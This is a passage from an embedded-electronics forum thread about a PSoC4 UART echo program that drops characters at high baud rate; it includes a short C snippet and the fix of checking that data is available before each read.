you have Python 1.5.2, use this urllib2 and urllib. Otherwise, you're OK. The BSD license (included in distribution). Yes, since 0.1.12. print form is usually all you need. HTMLForm.possible_items can be useful. Note that it's possible to use item labels instead of item names, which can be useful — use the by_label arguments to the various methods, and the .get_value_by_label() / .set_value_by_label() methods on ListControl. Only SelectControl currently supports item labels (which default to OPTION element contents). I might not bother to fix this, since it seems it's probably only useful for anyway. '*'characters mean in the string representations of list controls? A * next to an item means that item is selected. Parentheses (foo) around an item mean that item is disabled. .click*()when that control has non- Nonevalue? Either the control is disabled, or it is not successful for some other reason. 'Successful' (see HTML 4 specification) means that the control will cause data to get sent to the server. RADIOand multiple-selection SELECTcontrols? Because by default, it follows browser behaviour when setting the initially-selected items in list controls that have no items explicitly selected in the HTML. Use the select_default argument to ParseResponse if you want to follow the RFC 1866 rules instead. Note that browser behaviour violates the HTML 4.01 specification in the case of RADIO controls. .click()ing on a button not work for me? RESETbutton doesn't do anything, by design - this is a library for web automation, not an interactive browser. Even in an interactive browser, clicking on RESETsends nothing to the server, so there is little point in having .click()do anything special here. BUTTON TYPE=BUTTONdoesn't do anything either, also by design. This time, the reason is that that BUTTONis only in the HTML standard so that one can attach callbacks to its events. The callbacks are functions in SCRIPTelements (such as Javascript) embedded in the HTML, and their execution may result in information getting sent back to the server. ClientForm, however, knows nothing about these callbacks, so it can't do anything useful with a click on a BUTTONwhose type is BUTTON. See the General FAQs page for what to do about this. The ClientCookie package makes it easy to get .seek()able response objects, which is convenient for debugging. See also here for few relevant tips. Also see General FAQs. import bisect def closest_int_value(form, ctrl_name, value): values = map(int, form.possible_items(ctrl_name)) return str(values[bisect.bisect(values, value) - 1]) form["distance"] = [closest_int_value(form, "distance", 23)] John J. Lee, January 2005.
http://wwwsearch.sourceforge.net/old/ClientForm/src/README-0_1_17.html
CC-MAIN-2017-04
refinedweb
1,151
52.76
You are browsing a read-only backup copy of Wikitech. The primary site can be found at wikitech.wikimedia.org Incident documentation/2017-03-20 Special AllPages Summary On the 2017-03-20, Special:AllPages started creating large amounts of slow database queries on enwiki, creating slowdowns/outage on all database queries on that wiki between 14:21 and 14:36 UTC. To mitigate this, AllPages was first fully disabled on all wikis, and later re-enabled with reduced functionality. Timeline - [not noticed at the time] Between 12-14 hours, scraping of [[Special:AllPages]] is done on some wikis- while this is a discouraged practice (both dumps, API or labs replicas are preferred options), it doesn't create any issues- partly because probably the throughput was probably low, partially because this is not a taxing operation for non-large wikis. This can be seen as a small spike of x4 s7 open connections at 12:23, maybe others. Also a user said that had happened. - At 14:01, the same scraping starts impacting enwiki, increasing the number of open connections (not yet in outage, just making things slow) - At 14:21, a first page is sent about db1080 unable to receive checks because max_connections (10000) is full. All other databases serving main traffic follow, with a period of flopping alters as a) unreachable databases are depooled, which makes the connections drop, and then repooled, b) a watchdog kills long running connections, but only when they reach 300 seconds (and the concurrency on queries is high enough to not being able to keep with the new connections). A snowball effects happens because the more connections are created, the slower the servers are, and the less they can keep processing or killing queries. - At this point, this is thought to be a software issue for the following reasons: it is happening on all database servers at the same time, the aggregated open connections is high with no visible db functionality problem or locking other than that, and the slow query logging only show a single query digest being slow (shown also on SHOW PROCESSLIST): SELECT /* SpecialAllPages::showChunk */ page_title FROM `page` WHERE page_namespace = '0' AND page_is_redirect = '0' AND (page_title < 'Entomacrodus_stellifer') ORDER BY page_title DESC LIMIT 344, 1 /* bff89ebd2be06faa4ae5c18dcc972d02 db1079 eswiki 5s */. This query is happening not only on enwiki, but it is only causing an outage there. - At 14:22: hashar@tin: Synchronized php-1.29.0-wmf.16/includes/specials/SpecialWatchlist.php: reverts commit SpecialWatchlist.php 0d675d2 (duration: 00m 43s). This revert was requested, as it was a change that had happened just before involving a special page- the real Special page responsible has not yet identified. It has no effect. - Conversation switches to private channels for the fear this could be a DOS attack. Special:AllPages is identified as the immediate cause by both inspecting the code and analyzing http requests done. - At 14:36 hashar: Disabled Special:AllPages on all wikis making it spurts a blank page instead. ( ) - At 14:39, open connections return to normal levels. Outage and/or slowdown ends. - T160914 is created as a private task because of fear of a directed attack- also to prevent malicious agents to simulate the same requests and bring the service down again. Discussion is ongoing about the root cause and the best way to proceed (the goal is to reenable Special:AllPages ASAP, once the issue has been avoided. A less detailed, but more informative public bug is created on T160916 - At 20:12 some proper patches ( ) are reviewed and deployed to production, which reenables Special:AllPages but limits the ability to filter by is_redirect flag for wikis running in miser mode. Conclusions A long running database query that was usually infrequently used started being executed hundreds of times per minute, with >4000 executions. This lead to an exhaustion of db connection resources, and db resources in general on the shard "s1". While no server crashed, this meant a slowdown or denial of service of some mediawiki requests to the English Wikipedia. The exact amount of users affected is difficult to measure: around 600 errors were registered, but that doesn't account for requests that were served but were too slow to be useful, or requests that did not even arrive or were sent in the first place because of slowness. On the other side, some of those errors only affected the single user creating those requests. In any case, this mostly impacted editors and authenticated users' requests, as those are the mostly affected by uncached requests. We believe not most of the editors were affected, as the edit rate didn't seem highly affected at 14:20 hours and contributors commented the site may be slow, but not unresponsive, and they could not reproduce a full outage reliably. The first kind of actionables is to fix the query so it is not slow anymore or it is avoided in the first place. The second kind are longer-term tasks to avoid this kind of issues in the first place, by implementing (or at least discussing the viability of) several strategies, at several layers: varnish cache, mediawiki application, and databases. Actionables Direct actionables to prevent this issue from reappearing - Solve ongoing connection database issues task T160914 Done - Reenable Special:AllPages, once the core issue is solved or worked around it task T160916 Done - Optimize SpecialAllPages::showChunk so that filtering based on the redirect flag may work again task T160983 In progress Long term actionables to solve more generic issues (to be discussed) - Throttling access to Special Pages that make potentially expensive queries task T160920 In progress - Reduce max execution time of interactive queries or a better detection and killing of bad query patterns. task T160984 In progress - Create an easy to deploy kill switch for every self-contained mediawiki functionality task T160985 In progress - BBlack mentioned some pending work on improve caching (Ticket?)
https://wikitech-static.wikimedia.org/w/index.php?title=Incident_documentation/2017-03-20_Special_AllPages&oldid=579179
CC-MAIN-2022-21
refinedweb
983
53.55
gcc-4.2.3 on Hardy/ia32 miscompiles simple code Bug Description Binary package hint: gcc-4.2 This is bizarre... gcc-4.2.3 for Hardy on ia32 compiles the code below into a program that prints 1. The correct answer is 0, and this is what all other compilers (including gcc-4.1 and gcc-3.4 on Hardy/ia32) return. Furthermore, FSF gcc-4.2.3 also gives the correct answer! Probably someone should look into this as comparison errors like this could easily have security implications. #include <stdio.h> int func_1 (void) { signed char l_11 = 1; unsigned char l_12 = -1; return (l_11 > l_12); } int main (void) { printf ("%d\n", func_1()); return 0; } Confirmed with gcc-4.2 4.2.3-2ubuntu7 in Hardy. However, 4.2.4-3ubuntu2 in Intrepid does *not* exhibit this bug. I've further confirmed that 4.2.3-4ubuntu1 (an older version in Intrepid) did not exhibit this bug. test packages are now available in the ubuntu-toolchain PPA. see https:/ Accepted into -proposed, please test and give feedback here. Please see https:/ Works for me. I also tested all my sources with it and didn't notice any regression. My test cases now pass. Thanks! gcc-4.2 4.2.4-1ubuntu3, which included a fix to address this issue, was released to hardy-updates on 2008-10-22. Closing this bug. I can confirm this with gcc: Installed: 4:4.2.3-1ubuntu6
https://bugs.launchpad.net/ubuntu/+source/gcc-4.2/+bug/256797
CC-MAIN-2018-09
refinedweb
244
70.8
In this Quick Tip you'll learn how to use the Math functions in Flash to create trails of movie clips along whichever path the mouse cursor takes. You'll also learn the basics of the Math functions, such as varying the size, alpha, and color of the Movie Clip - and all this using AS3. I hope you find this Quick Tip useful! Final Result Preview Let's take a look at the final result we will be working towards: Step 1: Make the Movie Clip First, open a new Flash file (Ctrl + N) and choose "ActionScript 3.0". We have to create the Movie Clip that will be duplicating around the scene. So go to Insert > New Symbol (Ctrl + F8). Call this symbol: "Ink", choose Movie Clip, and finally check the "Export for Actionscript" box. Step 2: Adding the "Ink" Now we have to create the ink in the Movie Clip. So, go to the first frame, take the Brush Tool (B) and draw a circle, then align it to the center. Make the same steps on three more frames and vary the color in each frame (first Frame: Red, second Frame: Blue, third Frame: Yellow, etc....). On each frame, open the Actions panel (hit F9) and add the stop action: stop(); Step 3: Organizing the Project Save this file on a folder on your computer, call it: "MathFunctions_Tutorial.fla". Create a new ActionScript file and save it in the same folder, give it a name of "MathFunctions_Flash.as". Finally, go to the Properties of MathFunctions_Tutorial.fla and change the Class field for the Actionscript File. If you're not very familiar with using classes, I recommend you read this Quick Tip. Step 4: Let's Start Coding! Open the file called "MathFunctions_Flash.as" and write the following code: package { import flash.display.MovieClip; import flash.events.*; public class MathFunctions_Flash extends MovieClip { In this action we are defining the Class and its properties. Now we have to tell Flash that when the mouse moves, the function called stageMouseMove() should be called. To do this, just write the following: public function MathFunctions_Flash(){ stage.addEventListener(MouseEvent.MOUSE_MOVE, stageMouseMove); } After that, we have to define this function and link the Movie Clip called "Ink" to the ActionScript. public function stageMouseMove(event:MouseEvent):void { var ink:Ink=new Ink(); Now we are going to add the actions to the variable and the function called stageMouseMove(). And here are the magical Math functions. OK, on the Math functions there a lot of things that make the magic. Here I leave you a small formula: ink.x=stage.mouseX; ink.y=stage.mouseY; ink.gotoAndStop(Math.ceil(Math.random()*5)); ink.scaleX=ink.scaleY=Math.random()*1; ink.alpha=Math.random()*10; stage.addChild(ink); } } } For more details on this formula, see Get a Random Number Within a Specified Range Using AS3. And that's all! Conclusion I hope you liked this Quick Tip, thanks for reading! Envato Tuts+ tutorials are translated into other languages by our community members—you can be involved too!Translate this post
https://code.tutsplus.com/articles/quick-tip-conjure-up-a-jazzy-mouse-cursor-trail--active-7686
CC-MAIN-2019-35
refinedweb
512
73.68
One of my fellow instructors in our Microsoft Authorized Academic Training Provider program has a favorite line when troubleshooting our 600+ node network: “Cabling, cabling, cabling.” His point, of course, is to remember to check hardware connections as the first step in the troubleshooting process. For the Windows 2000 environment, I’ve revised that mantra to: “DNS, DNS, DNS.” When the trust fails with the errorCannot Contact Domain Controller, I say, “Check your DNS.” When you try to run a DCPromo and you can’t contact the domain, I say, “Check your DNS.” In fact, as we found after four days of troubleshooting the failure of our Global Catalog services, DNS is a critical part of nearly all Active Directory operations. I will walk you through the dilemma we faced with the Global Catalog to help you get a feel for the critical role of DNS in Win2K. The Global Catalog dilemma It all started when the 28 students, as part of a lab assignment, began leaving our parent domain to form their own domains and forests. They soon found that Active Directory-integrated DNS zones are not effective across domains. Directory Replication takes place among domain controllers within a contiguous DNS namespace. If there is more than one domain in the site, each domain has its own version of Active Directory. If the domains are part of a forest, the Active Directory’s Global Catalog is the common denominator, not the Active Directory itself. Until trusts are in place, the DNS service is necessary for the clients to “see” each other. Each domain has its own namespace as defined in the DNS zone. Trusts between domains are automatic only when you’re in the same forest. Otherwise, if you want to create trusts between two domains, you can configure each as the secondary DNS server for the other’s zone. For example, there are two domains, east.local and west.local, in two different forests. The domain controller in east.local will be configured as a Standard Primary DNS server in the east.local domain. The domain controller in the west.local domain will be configured as a Standard Secondary server for the east.local domain. The domain controller in the west.local domain must be the Standard Primary DNS server for a zone called west.local. The domain controller in the east.local domain must be a Standard Secondary DNS server in the west.local zone. Figure A shows the screen for selecting zone types. One of the keys to making this work is to configure each of the zones with the other zone’s DNS server so that the DNS service will share the database entries. (You will change this back after the trust is in place.) You can accomplish this by going into each DC’s TCP/IP Properties. Then, if you configure your zones to allow zone transfers, the zone entries will automatically appear in each domain controller’s DNS cache. To speed up the process, go to Start | Programs | Administrative Tools | DNS, right-click on one of the two zones, and chooseTransfer From Master. If you have quite a bit of old information floating around in your DNS cache, you may want to run ipconfig /flushdns from the command line. This will clear out any entries in your DNS cache that might conflict with your new configuration. To test your configuration of DNS, try an nslookup from the command line. The name servers of each domain should be the DNS servers of the other. If you still have trouble creating trusts, you may just want to apply the latest Service Pack to your servers. That application made our trusts across forests successful. Remember when you are finished with your trust to set your TCP/IP Properties back to your usual preferred DNS servers. If you don’t, you won’t be able to see resources beyond the zones available in your DNS service. So what does all of this have to do with the Global Catalog Server? “DNS, DNS, DNS” is my answer. At some point in this major infrastructure change, the parent domain lost its Global Catalog Server. We had two domain controllers and one member server in the parent domain. After adding the second domain controller as a Global Catalog Server (which just means that we selected a check box in the NTDS Properties of the server in Active Directory Sites And Services), we tried creating new users. We received an error message saying that the Global Catalog Server could not be reached to verify the uniqueness of the usernames. The user accounts were created and functional, but it was obvious our Global Catalog Server had a small identity crisis. The Global Catalog Server works in conjunction with the NetLogon service. So the first thing we tried to do was to stop and restart our NetLogon service to see if the service could find the Global Catalog Server and kick it back into action. That didn’t work. Next, we ran Active Directory Replication Monitor (ReplMon), an extremely useful tool, from the Support folder of the Windows 2000 Server CD. The monitored servers were listed as not being configured as Global Catalog Servers, when they should have been operational (Figure B). Just to be sure that the ReplMon utility was giving us accurate information, I ran a check with another Support folder tool called Active Directory Administration Tool (see Figure C). For those programmers out there, this tool talks in Lightweight Directory Access Protocol (LDAP). This gave us our first hint of where the problem might be. At the bottom of the printout of the configuration of my server was the entryIsGlobalCatalogReady:FALSE. Now all we had to do was figure out how to change the FALSE to TRUE. After searching through the Naming Context and Configuration partitions in our domain via the ADSI Edit tool, we came back to our original theme: DNS. Why? Because the Global Catalog is a service. And the most important concept of the relationship of DNS, Windows 2000, and Active Directory is that DNS doesn’t just resolve host names to IP addresses. It also supports the SRV record in its Windows 2000 implementation, per RFC 2782, which states: “Such specification MUST define the symbolic name to be used in the Service field of the SRV record as described below….If an SRV-cognizant LDAP client wants to discover an LDAP server that supports TCP protocol and provides LDAP service for the domain example.com, it does a lookup of_ldap._tcp.example.com.” With the help of LDAP and TCP/IP, DNS can point to a service and resolve it to a host name, IP address, and service port. When we searched our DNS records, we couldn’t find a record resolving the Global Catalog Service. When we looked for an entry for the Global Catalog Service (gc, by name), we found no record pointing to our domain controllers. One of our students examined our DNS against another forest’s DNS and discovered that the subfolder in the _msdcs folder was missing. There should have been a gc folder. That subfolder is the placeholder for the service records for the Global Catalog Server. This folder is created through DCPROMO on the first DC in the forest or when a DC is selected to be a Global Catalog Server. To add the gc subfolder with the appropriate records, we right-clicked on the _msdcs and selected the Other New Record option. This opened a Resource Record Type box. We selected theService Location Record(see Figure D) and changed the Service to LDAP. We changed the Weight to 100. We changed the Port Number to 3268 (the GC port). We changed the Host Offering This Service field to the full DNS name of the Domain Controller we wanted to be the home of the Global Catalog Service. When we ran ReplMon, it showed our domain controllers as Global Catalog Servers, and we were able to become a fully functional network again. Summary Did we need to have the Global Catalog functioning? You bet! Without the Global Catalog, we could not make any changes to the structure of our domain, such as adding domain controllers, joining new computers to the domain, demoting domain controllers, or moving servers or workstations to different domains. When your network is running in native mode, the Global Catalog provides authentication for all logons. In a learning environment such as ours, losing the functionality of the Global Catalog can really put a cramp in our style. Now we have a smooth-running network, and students can create users, new domain controllers, and even new child domains with the kind of seamless operation Microsoft advertises. What kind of Win2K DNS issues have you encountered? Do you have tips and solutions for Win2K issues similar to this? We look forward to getting your input and hearing about your experiences regarding this topic. Join the discussion below or send the editor an e-mail.
http://www.techrepublic.com/article/when-troubleshooting-windows-2000-start-with-dns/
CC-MAIN-2017-13
refinedweb
1,506
62.78
Work at SourceForge, help us to make it a better place! We have an immediate need for a Support Technician in our San Francisco or Denver office. Daniel Barlow <dan@...> writes: > "Perry E. Metzger" <perry@...> writes: > >> Dunno. Perhaps. I think the existing names are reasonable, though I >> suspect that instead of rolling one's own threads, using the pthreads >> interface from the operating system would be far superior. Then one > > There are two reasons we don't use the pthreads interface > > (1) the 'LinuxThreads' implementation of pthreads as used in Linux 2.4 > is absolutely fucking awful, and screws up any program that > attempts to use signals for anything more complex than "duh, an > error happened, let's print a message and exit". As we use > signals for all kinds of stuff including a write barrier for the > GC, this was not an option. That's not the case on all other platforms. > (2) Accessing dynamically bound special variables requires > thread-local storage. Conceded that these tend to get used less > often than lexical variables, but even so, doing a foreign call > into C for every special variable access would (my gut feeling) be > so slow it wouldn't even qualify as a joke. Not to mention > involving interesting circularity issues with e.g. the way that > WITHOUT-INTERRUPTS works > > (1) really isn't a big deal any more (in fact we recommend linux 2.6 > for threaded sbcl anyway), but any pthreads-compatible sbcl is going > to have to work out how to cope with (2) sanely, and right now I don't > have the time. Generally speaking, the thread local storage is accessed in extremely simple ways. For example, on NetBSD, pthread_getspecific simply does: self = pthread__self(); return (self->pt_specific[key]); On most architectures, a register is reserved for the pthread pointer and the pthread__self call ends up being an inlined register access, so in the end, that whole call turns into nothing but a register relative access. On other platforms, it involves a little trickery and one or two more instructions. The compiler can, in all likelihood, do all that directly -- it is simple enough. There is no need to call out to C, or even to invoke a function. It has to be OS and platform specific but that isn't a giant issue. -- Perry E. Metzger perry@... View entire thread
http://sourceforge.net/p/sbcl/mailman/message/11216339/
CC-MAIN-2014-35
refinedweb
394
61.67
Bugs in the latest GPAW¶ Handling segfaults¶ Segmentation faults are probably the hardest type of runtime error to track down, but they are also quite common during the unstable part of the release cycle. As a rule of thumb, if you get a segfault, start by checking that all array arguments passed from Python to C functions have the correct shapes and types. Apart from appending --debug to the command line arguments when running python or gpaw-python, please familiarize yourself with the debugging tools for the Python and C code. If you experience segfaults or unexplained MPI crashes when running GPAW in parallel, it is recommended to try a custom installation with a debugging flag in customize.py: define_macros += [('GPAW_MPI_DEBUG', 1)] Common sources of bugs¶ General: - Elements of NumPy arrays are C ordered, BLAS and LAPACK routines expect Fortran ordering. Python: Always give contiguous arrays to C functions. If xis contiguous with dtype=complex, then x.realis non-contiguous of dtype=float. Giving array arguments to a function is a carte blanche to alter the data: def double(a): a *= 2 return a x = np.ones(5) print(double(x)) # x[:] is now 2. Forgetting a n += 1statement in a for loop: n = 0 for thing in things: thing.do_stuff(n) n += 1 Use this instead: for n, thing in enumerate(things): thing.do_stuff(n) Indentation errors like this one: if ok: x = 1.0 else: x = 0.5 do_stuff(x) where do_stuff(x)should have been reached in both cases. Emacs: always use C-c >and C-c <for shifting in and out blocks of code (mark the block first). Don’t use mutables as default values: class A: def __init__(self, a=[]): self.a = a # All instances get the same list! There are subtle differences between x == yand x is y. If His a numeric array, then H - xwill subtract xfrom all elements - not only the diagonal, as in Matlab! C: - Try building GPAW from scratch. - Typos like if (x = 0)which should have been if (x == 0). - Remember breakin switch-case statements. - Check malloc-freepairs. Test for memory leaks by repeating the call many times. - Remember to update reference counts of Python objects. - Never put function calls inside assert’s. Compiling with -DNDEBUGwill remove the call.
https://wiki.fysik.dtu.dk/gpaw/devel/bugs.html
CC-MAIN-2019-09
refinedweb
380
66.74
The other day I actually read the ASCII table. Seems odd as I've dealt with this for probably more that seven years but I've never really looked at the special characters. I remember when I started programming with QBasic/Visual Basic I first looked at the table - I ignored the non-printable characters as they looked too complicated. And for some reason I've never really looked at them again. In my last job there were a number of ASCII protocols using STX and ETX but even then I never looked at anything outside of tab and carriage return (don't get me started on this character...). So yeah it's a bit of a surprise and now I plan to make better use (or ignore) these characters in my future code.
http://bobthegnome.blogspot.com/2007/02/secrets-of-ascii-table.html
CC-MAIN-2019-35
refinedweb
134
66.88
the code below as a custom cell in a listview. I am trying to use ForceUpdateSize() in order to update the cell of the listview whenever there is a change in the bound properties. The listview has the attribute HasUnevenRows="True". Still, when I change the name property to a long string at runtime (by using a button) in iOS, the row does not expand. But when string is long in the beginning of the application, the row has enough space to show the whole string. In Android, it seems to work fine even without the ForceUpdateSize() call. What should be done to update the height of the row to adapt to the changing content in iOS? public class CustomCell : ViewCell { public CustomCell() { Label age = new Label(); Label name = new Label(); StackLayout cellWrapper = new StackLayout(); age.SetBinding(Label.TextProperty, "Age"); name.SetBinding(Label.TextProperty, "Name"); age.PropertyChanged += UpdateCell; name.PropertyChanged += UpdateCell; cellWrapper.Children.Add(age); cellWrapper.Children.Add(name); View = cellWrapper; } void UpdateCell(object sender, EventArgs e) { ForceUpdateSize(); } } Hello, You can reach the sample project following the link below: When you start the application on iPhone and click "Change Name" button, you will see that the new name label for the first row will be changed and this long name will not fit in. As you scroll down and up again, you will see the row heigth increased in order to show the whole label. (I think this is due to row recycling) Best regards. Aha! Yes, I see the issue when the ListView uses RecycleElement. That was the missing piece. Thank you! You're welcome. Row height adjusts when the cell is recycled but not when the bound data changes. And ForceUpdateSize() and such does not seem to help. It seems to be an important issue actually but I cannot change the "importance" field of the bug. Would you consider prioritizing it? By the way, I am not familiar with the bug fixing process of Xamarin. Does a bug like this usually get fixed in a month or so? Regards. Any update on this one? Should be fixed in 2.3.5-pre1 Sounds much like mine Which still exists in 2.3.5-pre @Rui Marinho: I tested it with 2.3.5-pre1. The value is updated but now listview scrolling is totally broken in a weird way. Have you tested it with the sample project I uploaded to Dropbox and shared the link previously? I tested this against 2.3.5-pre3: 1.) There is no need for a custom cell at all as it doesn't do anything 2.) Bug: If set to RetainElement the new text is shown, but the image is not resized at all until you scroll down and scroll back up it is resized correct. 3.) Bug: if set to it to RecycleElement then it doesn't resize at first and you can't see the rest of the text, but as soon as you scroll down and up it is resized correct. I have attached screenshots and new test project. Created attachment 22949 [details] Test project Created attachment 22951 [details] RecycleElement after updating Created attachment 22952 [details] RetainElement after adjusting text Is there a target build to address this iOS issue? I have tried the latest Xamarin.Forms 2.4.0.275-pre3 and with RetainElement, RecycleElement, and RecycleElementAndDataTemplate and in all cases the cell does not resize when text is added. The only way to see the new text is to scroll down or rotate which most users won't figure out on their own. My app is in production and I have been waiting a few months for a fix. Thank for your attention to this matter. Any update on this one? I also reported another bug on the subject of RecycleElement: Bug 60952. RecycleElement feature seems to be very buggy but it is also necessary for smooth scrolling in a lot cases other than the simplest: see Bug 60950. Listview is a vital component of this platform and these issues seem to be ignored by Xamarin as even this bug alone is not fixed since almost one year and three months. Other than the ones I reported, there seem to be other bugs reported about this. I believe RecycleElement bugs should be prioritized. +1 Please fix this. Same problem as others: Forms project, xaml ViewCell with FFSvgCacheImage (url source), but not every row has a image. Row won't resize correctly until the row is manually scrolled up out of view. Calling ForceUpdateSize on image load success didn't work, app becomes unresponsive. Setting the image source in BindingContextChanged vs. in xaml was no help (if I did it right); in fact, it's worse, images in first visible rows don't load until scroll past, and sometimes images re-load into wrong rows when scrolling around (or don't get removed from recycled rows). I have 100+ rows. ReloadData was even worse. If anyone knows how to workaround this, please help. Xamarin you need to fix this. This should just work. Migrated to. Please follow that issue for updates. Thanks!
https://xamarin.github.io/bugzilla-archives/44/44525/bug.html
CC-MAIN-2019-26
refinedweb
854
74.19
Outlook Mail Outlook Lotus Notes Synchronize Outlook Lotus Notes Do you want to Access Lotus Notes using Outlook? 2. How to read Lotus Notes NSF emails into Outlook? 3. How to convert IBM Lotus Notes Folders into Outlook Folders? If you have all above query in your mind then access Lotus Notes using Outlook PST because only Export Notes software can resolve these systematically because this tool consist advance algorithms which helps to migrate Lotus Notes database to Outlook format. . access lotus notes using outlook , migrate lotus notes database to outlook , lotus notes nsf reader , export lotus notes files to outlook , lotus notes using outlook , can ms outlook read nsf files Access Lotus Notes from Outlook inclusive all email with attachments. appointments. We are providing a NSF to PST tool called Export Notes that is fully prepared to convert or open NSF in Outlook. Trial version of software performs conversion of 16 items per folder from Lotus Notes to Outlook. . access lotus notes from outlook , view lotus files , open nsf in outlook , read lotus notes in outlook , export nsf to pst , converting lotus notes to outlook , export notes , lotus notes to outlook. export lotus calendar , lotus notes calendar view in pst , notes calendar to outlook , sync lotus notes calendar to outlook , access lotus notes from outlook , lotus notes calendar to outlook Have.. open notes in outlook , notes in outlook , lotus notes to outlook , open lotus notes in outlook , export notes , export notes to outlook , read lotus notes in outlook , access lotus notes in outlook Notes. Our Outlook to Notes tool is very simple but dynamic & very powerful software. . convert pst to nsf , migrate outlook to notes , nsf to pst , move outlook to notes , nsf to pst conversion , nsf to pst , dwg to pdf converter , lotus notes to pst conversion Lotus Notes client can easily read Lotus Notes email in Outlook PST within few seconds via Export Notes as this email migration utility provide simple steps to view Lotus Notes in Outlook at nominal cost. It offers a smart GUI interface as novice users can frequently open Lotus Notes database in Outlook format. . read lotus notes email , using outlook 2007 to read lotus notes email , view lotus notes in outlook , export nsf to pst , lotus notes data export , email migration , lotus to pst , lotus notes conversion tool , convert nsf files to pst , nsf to pst , notes to outlook Export Notes Software helps in converting Notes to Outlook. After that users can easily Open Notes in Outlook. Read Lotus Notes in Outlook and Access Lotus Notes in Outlook. . Read lotus notes in outlook , lotus notes to outlook , export notes in outlook , nsf to pst , export notes tool At present various of Lotus Notes Conversion software are exist in online market they promises you to the conversion of NSF to PST but they have not provide you a 100% security. Notes to PST Migration software convert Lotus Notes database like text. from. contacts/Groups and emails in PST format. SysTools Export Notes latest version converts password encrypted Lotus Notes files & emails to Outlook. it also export images from emails as attachments and support Recurrence Calendar. . nsf to pst , export lotus notes database , from lotus notes to outlook , notes in outlook SysTools Outlook to Notes software is unique and widely accepted software which is specially designed to convert Outlook to Lotus Notes. For those users who want to use Lotus Notes securities and want to access Lotus Notes from Outlook. Access lotus notes from outlook , lotus notes to outlook , outlook connector for notes , notes to outlook , pst to lotus notes Export email with attachments from Lotus Notes to Outlook simply. Grab quick and qualitative Export Notes software. effective Notes to PST Migration Tool and line up your conversions. Notes to PST Migration software convert Lotus Notes database like text. from. contacts/Groups and emails in PST format. Export Notes converts password encrypted Lotus Notes files & emails to Outlook. from lotus notes to outlook , lotus notes to outlook , notes in outlook , lotus notes conversion to outlook , lotus notes convert , notes to pst migration , open nsf in outlook , export notes , convert nsf to pst , access nsf , export lotus notes database Get beneficial tool to import Lotus Notes NSF folders to Outlook ANSI and Unicode format. Software support custom recurrence calendar facility and bulk conversion from Lotus Notes to Outlook. You have not wait for long time procedure between NSF to PST conversion because our most famous Convert NSF to Exchange conversion utility help to rapidly Converting NSF Files to Outlook without changing. The software runs on all Windows version. Outlook version and Lotus Notes version. By this software data is easily access Lotus Notes from Outlook file. . import lotus notes nsf folders to outlook , access lotus notes from outlook , nsf to pst attachments , convert nsf to exchange , converting nsf files . change from notes to outlook , move from lotus notes , email converter , lotus notes conversion , export lotus notes , export notes , notes email migration tool , access lotus notes emails in outlook Lotus Notes Migration to Outlook Software help in Lotus Notes Email Access in PST. SysTools Export Notes software provides you the ability to switch from Lotus Notes environment to MS Outlook environment. . lotus notes conversion , lotus notes email access , lotus notes conversion , view lotus notes in outlook , lotus notes to outlook Notes Email Migration Tool gives you easy environment for using Notes in MS Outlook. To Access Lotus Notes in MS Outlook. SysTools is available. Using Notes Email Migration Tools you can easily Open entire database of Lotus Notes in MS Outlook. . Access lotus notes in ms outlook , export notes , notes to outlook conversion tool , lotus notes to outlook , lotus notes to outlook You are shift your job and there has Outlook environment but in previous company you are using Lotus Notes environment and now you want to Access Lotus Notes Email to Outlook using trouble free way. With Export Notes you can easily Read Lotus Notes NSF files all the items such as emails. to-do list etc in Outlook PST files without any corruption of your original data. . Lotus Notes into Outlook can be easily achieved by SysTools Export Notes software and you can quickly Convert Lotus Notes Database to Outlook. User can convert SINGLE or UNLIMITED Lotus Notes NSF files into Outlook using few easy steps. After Converting Lotus Notes NSF files in Outlook PST you can easily access & Read Lotus Notes into Outlook. . nsf to pst , notes to outlook tool , outlook to notes , lotus notes into outlook. Convert Lotus Notes to Outlook 2014 as simple and effective way of Export Notes software. Most of the user set up their business with Lotus Notes email client and after some time they face many problem due to highly technical environment so decide to change Lotus Notes to Outlook email client whom easily access at any place and compatible with all version. Pay little amount and get reliable third party tool like NSF to PST conversion tool which expert in unlimited Lotus Notes email convert to Outlook process. . lotus notes to outlook 2014 , export lotus notes to pst , nsf to pst conversion , lotus notes email convert to outlook , nsf to outlook Filter: All / Freeware only / Title OS: Mac / Mobile / Linux Sort by: Download / Rating / Update
http://freedownloadsapps.com/s/access-lotus-notes-from-outlook/
CC-MAIN-2018-30
refinedweb
1,209
56.79
PSoC4: UART strangeness with example code | Cypress Semiconductor PSoC4: UART strangeness with example code Hi, In a recent project I used a UART (SCB implementation) at very high baudrate 921600. running the PSoC @ 36MHz and oversampling of 13 gives nice within tolerance baudrate... anyway in this project I run into some unforseen problems (who doesn't ;-) below is one of them... I have a project in PSoC Creator 3.1 (did not test any other version) and a 4200 prototype kit, programmed with a miniprog3. the project just instantiates a UART (SCB) and will echo all incoming data back to the host (PC). simple right? The UART is configured with a large software buffer (128 characters) and in the testbench I make sure the data to the PSoC is throttled (never causing a buffer overflow etc...) I am using the UartgetByte() API because I really would like it to work fully transparant (including the \00 character !) Digging in the API one can read that bits b15-b8 are used to report errors and thus can be used to detect the 'no data' situation since we are polling... my test approach is simple, use a good serial terminal program and verify that "what goes in must come out" and to my surprise it does not work... I use an application called terminal and it allows the same data to be transmitted periodically, thereby throttling the datarate. text "0123456789" repeated every 100ms. by playing with the horizontal window size it's possible to align every new line and easily visually spot problems... every once in a while only the first character is missing, reading back a 0123456789123456789012345... Now I do understand async data transfers, and maybe maybe frame error ? code snippet: #include <project.h> int main() { uint32 UART_data; CyGlobalIntEnable; HOST_Start(); while (1) { UART_data=HOST_UartGetByte(); if ((UART_data&0x0000FF00)==0) // test b15-b8 for errors { // no error, just echo the data back HOST_SpiUartWriteTxData(UART_data & 0xFF); } } } if I change the line "if ((UART_data&0x0000FF00)==0)" with if ((UART_data&0x000000FF)!=0) thereby disregarding all reported errors and repeating the test, it never fails! (and in doing this it will never echo the \00 character anymore, thereby killing the transparent echo.... could have used UartGetChar() API...) So now I'm left with 2 of questions: 1. What's the meaning of the error bits b15-b7, the API function does not specify that.. 2. is the SCB more likely to get a frame error in 1st character? 3. so is that a problem with the PSoC or the Cypress usb-to-serial converter available on the prototype kit? 4. has anyone seen this before and has a solution ??? // I have checked the timing with a seleae logic16 and it sure looks like good data, no hickups etc.... hereby the project archive file PSoC Creator 3.1, all updates applied. To help you more than just doing some guesswork I would like to have a look into your project with all of its settings. To do so, use Creator->File->Create Workspace Bundle (minimal) and attach the resulting file. Bob Can you please try the attached changes? Bob Hi Bob, Implemented the check available before read action, and this does the job. tested the terminal once again and could not make it fail... so this leads to the 